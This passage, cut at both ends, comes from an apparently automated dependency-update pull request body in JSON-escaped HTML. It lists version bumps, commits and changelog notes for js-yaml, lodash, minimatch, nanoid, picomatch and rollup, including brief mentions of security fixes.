!!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.21 to 4.17.23\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/dec55b7a3b382da075e2eac90089b4cd00a26cbb\"\u003e\u003ccode\u003edec55b7\u003c/code\u003e\u003c/a\u003e Bump main to v4.17.23 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6088\"\u003e#6088\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/19c9251b3631d7cf220b43bc757eb33f1084f117\"\u003e\u003ccode\u003e19c9251\u003c/code\u003e\u003c/a\u003e fix: setCacheHas JSDoc return type should be boolean (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6071\"\u003e#6071\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b5e672995ae26929d111a6e94589f8d03fb8e578\"\u003e\u003ccode\u003eb5e6729\u003c/code\u003e\u003c/a\u003e jsdoc: Add -0 and BigInt zeros to _.compact falsey values list (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6062\"\u003e#6062\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/edadd452146f7e4bad4ea684e955708931d84d81\"\u003e\u003ccode\u003eedadd45\u003c/code\u003e\u003c/a\u003e Prevent prototype pollution on baseUnset function\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/4879a7a7d0a4494b0e83c7fa21bcc9fc6e7f1a6d\"\u003e\u003ccode\u003e4879a7a\u003c/code\u003e\u003c/a\u003e doc: fix autoLink function, conversion of source links (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6056\"\u003e#6056\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/9648f692b0fc7c2f6a7a763d754377200126c2e8\"\u003e\u003ccode\u003e9648f69\u003c/code\u003e\u003c/a\u003e chore: remove \u003ccode\u003eyarn.lock\u003c/code\u003e file (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6053\"\u003e#6053\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/dfa407db0bf5b200f2c7a9e4f06830ceaf074be9\"\u003e\u003ccode\u003edfa407d\u003c/code\u003e\u003c/a\u003e ci: remove legacy configuration files (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6052\"\u003e#6052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/156e1965ae78b121a88f81178ab81632304e8d64\"\u003e\u003ccode\u003e156e196\u003c/code\u003e\u003c/a\u003e feat: add renovate setup (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6039\"\u003e#6039\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/933e1061b8c344d3fc742cdc400175d5ffc99bce\"\u003e\u003ccode\u003e933e106\u003c/code\u003e\u003c/a\u003e ci: add pipeline for Bun (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6023\"\u003e#6023\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/072a807ff7ad8ffc7c1d2c3097266e815d138e20\"\u003e\u003ccode\u003e072a807\u003c/code\u003e\u003c/a\u003e docs: update links related to Open JS Foundation (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/5968\"\u003e#5968\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.21...4.17.23\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `minimatch` from 3.1.2 to 3.1.5\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/7bba97888a27a6162983056bcce2a6e28f668712\"\u003e\u003ccode\u003e7bba978\u003c/code\u003e\u003c/a\u003e 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/bd259425b2ca17b42897997f93e890314155522d\"\u003e\u003ccode\u003ebd25942\u003c/code\u003e\u003c/a\u003e docs: add warning about ReDoS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a9c27c75725474dbde57db2995b6281b267756d\"\u003e\u003ccode\u003e1a9c27c\u003c/code\u003e\u003c/a\u003e fix partial matching of globstar patterns\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a2e084af579731af66c221214e3ca8222c9bf23\"\u003e\u003ccode\u003e1a2e084\u003c/code\u003e\u003c/a\u003e 3.1.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/ae24656237c3d58067442f790ce17eff84463a47\"\u003e\u003ccode\u003eae24656\u003c/code\u003e\u003c/a\u003e update lockfile\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/b1003749228b2a79e1f237963a0d559ef7a0941e\"\u003e\u003ccode\u003eb100374\u003c/code\u003e\u003c/a\u003e limit recursion for **, improve perf considerably\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/26ffeaa091b9f660833e23f42e07165b33e85c13\"\u003e\u003ccode\u003e26ffeaa\u003c/code\u003e\u003c/a\u003e lockfile update\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/9eca892a4e5dbb20534f9f30483b85cdeee6c2eb\"\u003e\u003ccode\u003e9eca892\u003c/code\u003e\u003c/a\u003e lock node version to 14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/00c323b188b704e5d4bc534ecec2268cfa70a32a\"\u003e\u003ccode\u003e00c323b\u003c/code\u003e\u003c/a\u003e 3.1.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/30486b2048929264f44d18822891cfffa02af78b\"\u003e\u003ccode\u003e30486b2\u003c/code\u003e\u003c/a\u003e update CI matrix and actions\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/minimatch/compare/v3.1.2...v3.1.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `nanoid` from 3.3.7 to 3.3.11\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ai/nanoid/releases\"\u003enanoid's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.3.11\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed React Native support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.3.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed React Native support (by \u003ca href=\"https://github.com/steida\"\u003e\u003ccode\u003e@​steida\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.3.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReduced npm package size.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ai/nanoid/blob/main/CHANGELOG.md\"\u003enanoid's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.3.11\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed React Native support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.3.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed React Native support (by \u003ca href=\"https://github.com/steida\"\u003e\u003ccode\u003e@​steida\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.3.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReduced npm package size.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.3.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a way to break Nano ID by passing non-integer size (by \u003ca href=\"https://github.com/myndzi\"\u003e\u003ccode\u003e@​myndzi\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/37289ceee51a3194a1f121a1e5d2bbb864076b74\"\u003e\u003ccode\u003e37289ce\u003c/code\u003e\u003c/a\u003e Release 3.3.11 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/23690b77719ec8043c2509d28c1d74b0e2295b75\"\u003e\u003ccode\u003e23690b7\u003c/code\u003e\u003c/a\u003e Fix CI\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/c147962de7f5da3311a0e731030a28f49c5266a3\"\u003e\u003ccode\u003ec147962\u003c/code\u003e\u003c/a\u003e Fix RN support\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/a83734e28fa071f51fe3614a5fb891f08a4b91b2\"\u003e\u003ccode\u003ea83734e\u003c/code\u003e\u003c/a\u003e Move to manually ESM/CJS dual package\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/bb12e8a6f9c37ebe0b5ff2c697b8f9dcf34c8948\"\u003e\u003ccode\u003ebb12e8a\u003c/code\u003e\u003c/a\u003e Release 3.3.10 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/8f44264cd724080447f40620974163f1daca4612\"\u003e\u003ccode\u003e8f44264\u003c/code\u003e\u003c/a\u003e Fix Expo support\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/adf9b0c05eeeebbbf391c16bbd93da2fc275e235\"\u003e\u003ccode\u003eadf9b0c\u003c/code\u003e\u003c/a\u003e Release 3.3.9 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/1c6f08825b4f17c4462bd1c19dbc3f1c5626b76f\"\u003e\u003ccode\u003e1c6f088\u003c/code\u003e\u003c/a\u003e Remove dev file from npm package\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/3044cd5e73f4cf31795f61f6e6b961c8c0a5c744\"\u003e\u003ccode\u003e3044cd5\u003c/code\u003e\u003c/a\u003e Release 3.3.8 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/4fe34959c34e5b3573889ed4f24fe91d1d3e7231\"\u003e\u003ccode\u003e4fe3495\u003c/code\u003e\u003c/a\u003e Update size limit\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ai/nanoid/compare/3.3.7...3.3.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.3.2\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains constructor by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ehttps://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md\"\u003epicomatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease history\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAll notable changes to this project will be documented in this file.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"http://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e\nand this project adheres to \u003ca href=\"http://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003eChangelogs are for humans, not machines.\u003c/li\u003e\n\u003cli\u003eThere should be an entry for every single version.\u003c/li\u003e\n\u003cli\u003eThe same types of changes should be grouped.\u003c/li\u003e\n\u003cli\u003eVersions and sections should be linkable.\u003c/li\u003e\n\u003cli\u003eThe latest version comes first.\u003c/li\u003e\n\u003cli\u003eThe release date of each versions is displayed.\u003c/li\u003e\n\u003cli\u003eMention whether you follow Semantic Versioning.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eChangelog entries are classified using the following labels \u003cem\u003e(from \u003ca href=\"http://keepachangelog.com/\"\u003ekeep-a-changelog\u003c/a\u003e\u003c/em\u003e):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eAdded\u003c/code\u003e for new features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eChanged\u003c/code\u003e for changes in existing functionality.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDeprecated\u003c/code\u003e for soon-to-be removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eRemoved\u003c/code\u003e for now removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eFixed\u003c/code\u003e for any bug fixes.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSecurity\u003c/code\u003e in case of vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e4.0.0 (2024-02-07)\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix bad text values in parse \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/126\"\u003e#126\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/connor4312\"\u003e\u003ccode\u003e@​connor4312\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove process global to work outside of node \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/129\"\u003e#129\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/styfle\"\u003e\u003ccode\u003e@​styfle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd sideEffects to package.json \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/128\"\u003e#128\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/frandiox\"\u003e\u003ccode\u003e@​frandiox\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved \u003ccode\u003eos\u003c/code\u003e, make compatible browser environment. See \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/124\"\u003e#124\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/gwsbhqt\"\u003e\u003ccode\u003e@​gwsbhqt\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.1\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/81cba8d4b767cab3cb29d26eb4f691eed75b73b2\"\u003e\u003ccode\u003e81cba8d\u003c/code\u003e\u003c/a\u003e Publish 2.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/fc1f6b69006e9435caf8fb40d8aff378bc0b7bce\"\u003e\u003ccode\u003efc1f6b6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/eec17aee5428a7249e9ca5adbb8a0d28fa29619b\"\u003e\u003ccode\u003eeec17ae\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/78f8ca4362d9e66cadea97b93e292f10096452ed\"\u003e\u003ccode\u003e78f8ca4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/156\"\u003e#156\u003c/a\u003e from micromatch/backport-144\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/3f4f10eaa65bf3a52e8f2999674cd27e11fa3c9b\"\u003e\u003ccode\u003e3f4f10e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/144\"\u003e#144\u003c/a\u003e from Jason3S/jdent-object-properties\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `rollup` from 4.21.0 to 4.60.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/rollup/rollup/releases\"\u003erollup's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.60.0\u003c/h2\u003e\n\u003ch2\u003e4.60.0\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2026-03-22\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport source phase imports as long as they are external (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6279\"\u003e#6279\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6279\"\u003e#6279\u003c/a\u003e: feat: external only Source Phase imports support (\u003ca href=\"https://github.com/guybedford\"\u003e\u003ccode\u003e@​guybedford\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.59.1\u003c/h2\u003e\n\u003ch2\u003e4.59.1\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2026-03-21\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix a crash when using lazy dynamic imports with moduleSideEffects:false (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6306\"\u003e#6306\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6281\"\u003e#6281\u003c/a\u003e: fix(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6282\"\u003e#6282\u003c/a\u003e: chore(deps): update github artifact actions (major) (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6283\"\u003e#6283\u003c/a\u003e: chore(deps): update dependency nyc to v18 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6284\"\u003e#6284\u003c/a\u003e: fix(deps): update swc monorepo (major) (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6285\"\u003e#6285\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6290\"\u003e#6290\u003c/a\u003e: chore(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6291\"\u003e#6291\u003c/a\u003e: chore(deps): update dependency \u003ccode\u003e@​shikijs/vitepress-twoslash\u003c/code\u003e to v4 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6292\"\u003e#6292\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6297\"\u003e#6297\u003c/a\u003e: chore(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6298\"\u003e#6298\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6299\"\u003e#6299\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6300\"\u003e#6300\u003c/a\u003e: docs: update packagephobia link (\u003ca href=\"https://github.com/bluwy\"\u003e\u003ccode\u003e@​bluwy\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6301\"\u003e#6301\u003c/a\u003e: chore(deps): update dependency lint-staged to ^16.3.3 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6306\"\u003e#6306\u003c/a\u003e: fix: fix chunk assignment for deoptimized module with dynamic import (\u003ca href=\"https://github.com/JoaoBrlt\"\u003e\u003ccode\u003e@​JoaoBrlt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6307\"\u003e#6307\u003c/a\u003e: chore(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6308\"\u003e#6308\u003c/a\u003e: chore(deps): update dependency lru-cache to v11 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6309\"\u003e#6309\u003c/a\u003e: chore(deps): update dependency vite to v8 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6310\"\u003e#6310\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6311\"\u003e#6311\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6312\"\u003e#6312\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev4.59.0\u003c/h2\u003e\n\u003ch2\u003e4.59.0\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2026-02-22\u003c/em\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/rollup/rollup/blob/master/CHANGELOG.md\"\u003erollup's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.60.0\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2026-03-22\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport source phase imports as long as they are external 